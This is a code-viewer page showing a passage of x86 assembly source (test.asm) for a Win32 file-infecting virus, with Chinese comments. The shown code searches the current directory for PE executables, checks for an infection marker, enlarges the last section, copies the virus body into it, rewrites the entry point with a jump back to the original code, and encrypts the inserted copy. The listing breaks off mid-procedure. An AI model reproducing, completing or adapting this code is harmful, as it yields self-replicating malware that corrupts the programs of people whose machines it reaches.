📄 test.asm
字号:
.386
.model flat,stdcall
.data
.const
.code
start:
virse_start:
;----------------重定位
call Relocate
Prepare:
call LoadApis ;载入API函数
cmp eax,000000000h
jz toOldEntry
mov edx,offset bufDir ;prepare before infection
add edx,ebp
push edx
push 104h
call [ebp + _GetCurrentDirectoryA]
cmp eax,0
jna toOldEntry
cmp eax,104h
ja toOldEntry
mov edx,offset bufDir
add edx,ebp
push edx
call [ebp + _SetCurrentDirectoryA]
cmp eax,00000000h
jna toOldEntry
mov ecx,02h ;感染文件数
mov eax,offset win32_find_data
add eax,ebp
push eax
mov eax,offset szExe
add eax,ebp
push eax
call [ebp + _FindFirstFileA]
cmp eax,00000000h
jna Display
mov [ebp + hFind],eax
InfectLoop: ;查找文件,并感染
mov [ebp + nCounte],ecx
jmp InfectFile ;返回句柄非零,感染
Next:
mov eax,offset win32_find_data
add eax,ebp
push eax
push dword ptr [ebp + hFind]
call [ebp + _FindNextFileA]
cmp eax,00000000h
jna Display
mov ecx,dword ptr [ebp + nCounte]
loop InfectLoop
push dword ptr [ebp + hFind]
call [ebp + _FindClose]
jmp Display ;跳到表现部分
InfectFile:
mov word ptr [ebp + isExe],00h
mov eax,offset cFileName
add eax,ebp
call CreateF ;打开文件
cmp eax,0
jna next
mov [ebp + hFile],eax ;保存文件句柄
Mapping_1:
call FileMapping
cmp eax,0
jz Next
mov esi,eax
movzx edx,word ptr [eax]
cmp edx,5a4dh ; check MZ
jnz Exe?
mov eax,dword ptr [esi + 3ch]
add eax,esi ;eax -> PE
mov edx,dword ptr [eax]
cmp edx,00004550h ; check PE
jnz Exe?
mov edx,dword ptr [eax + 4ch]
cmp edx,00000001h
jz Exe?
mov word ptr [ebp + isExe],0ffffh
add [ebp + dwFileSizeLow],offset virse_end - offset virse_start
Exe?:
mov eax,esi
call UnmapView
mov eax,[ebp + hMapFile]
call CloseH
cmp word ptr [ebp + isExe],0000h
jz Next
Mapping_2:
nop
nop
call FileMapping
cmp eax,0
jz Next
mov [ebp + ImageBase],eax
mov esi,dword ptr [eax + 3ch]
add esi,eax ;save PE
mov eax,[esi + 28h]
mov [ebp + OldEntry],eax ;save Formal EntryPointer
mov eax,esi
add eax,18h
movzx ecx,word ptr [esi + 14h] ;SizeOfOptionalHeader
add eax,ecx
movzx ecx,word ptr [esi + 06h] ;eax= Number Of Sections
dec ecx
xor ebx,ebx
f0:
mov edx,dword ptr [eax + 24h]
and edx,060000020h
cmp edx,060000020h
jnz f1
add ebx,dword ptr [eax + 08h]
f1:
add eax,28h
loop f0
mov edi,eax ;save the last setion header
push [edi + 08h]
mov eax,[edi + 08h]
add eax,offset virse_end - offset virse_start
mov dword ptr [edi + 08h],eax ;modify Virtual Size
mov ecx,[esi + 3ch]
call Alignize
mov dword ptr [edi + 10h],eax ;modify SizeOfRawData
mov eax,[edi + 08h]
add eax,[edi + 0ch]
mov ecx,[esi + 38h]
call Alignize
mov dword ptr [esi + 50h],eax ;modify SizeOfImage
add ebx,[edi + 08h]
mov eax,ebx
mov ecx,[esi + 3ch]
call Alignize
mov dword ptr [esi + 1ch],eax ;modify SizeOfCode
pop eax
mov ecx,eax
add eax,[edi + 0ch]
add eax,offset deccode - offset virse_start
mov dword ptr [esi + 28h],eax ;modify EntryPoint
mov [ebp + NewEntry],eax ;save NewEntry
mov edx ,dword ptr [edi + 24h]
or edx,0E0000000h
mov dword ptr [edi + 24h],edx
mov eax,[edi + 14h]
add eax,[ebp + ImageBase]
add eax,ecx ;Formal VirtualSize
push eax ;Save VirseCode start Address
mov edi,eax
mov esi,virse_start
add esi,ebp
mov ecx,offset virse_end - offset virse_start
cld
rep movsb
setEntyPoint:
pop edi
push edi
add edi,offset toOldEntry - offset virse_start
mov eax,000000e9h
stosb
mov eax,[ebp + OldEntry]
mov edx,[ebp + NewEntry]
add edx,offset toOldEntry - offset deccode
sub eax,edx
sub eax,05h
stosd
SetFlag:
mov eax,[ebp + ImageBase]
mov eax,[eax + 3ch]
add eax,[ebp + ImageBase]
mov dword ptr [eax + 4ch],00000001h
enc:
pop esi ;VirseCode start Address
call Encrypt
Infected:
push ebp
mov eax,[ebp + ImageBase]
call UnmapView
mov eax,[ebp + hMapFile]
call CloseH
mov eax,[ebp + hFile]
call CloseH
pop ebp
jmp Next
FileMapping proc ;---------映射文件过程
;-----------------------参数
;文件名:dwFileName,文件尺寸:dwFileSizeLow
;-----------------------
mov eax,[ebp + hFile]
mov ecx,[ebp + dwFileSizeLow]
call CreateFM ;创建文件映射
cmp eax,0
jna ClsF
mov [ebp + hMapFile],eax
mov ecx,0
call MapView ;映射文件
cmp eax,0
jna ClsMf
ret
ClsMf :
mov eax,[ebp + hMapFile]
call CloseH
ClsF :
mov eax,[ebp + hFile]
call CloseH
xor eax,eax
ret
FileMapping endp
Alignize proc
;------------对齐函数
;eax ecx
;--------------------
xor edx,edx
div ecx
inc eax
mul ecx
ret
Alignize endp
CreateF proc ;函数 CreateFileA
;----------参数
;eax 文件名
;------------------
xor edx,edx
push edx
push 00000080h
push 00000003h
push edx
push 00000003h
push 0e0000000h
push eax
call [ebp + _CreateFileA]
ret
CreateF endp
CreateFM proc ;函数 CreateFileMapping
;------------参数
;eax 文件句柄,ecx 文件尺寸 edx null
;------------------
xor edx,edx
push edx
push ecx
push edx
push 00000004h
push edx
push eax
call [ebp + _CreateFileMapping]
ret
CreateFM endp
MapView proc ;函数 MapViewOfFileA
;-----------参数
;eax 映射句柄,ecx 文件尺寸,edx null
;-----------------
xor edx,edx
push ecx
push edx
push edx
push 0000001fh
push eax
call [ebp + _MapViewOfFile]
ret
MapView endp
UnmapView proc ;函数 UnMapViewOfFileA
;----------参数
;eax 映射地址
;--------------------------
push eax
call [ebp + _UnmapViewOfFile]
ret
UnMapView endp
CloseH proc ;函数 CloseHandle
;----------参数
;eax 句柄
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -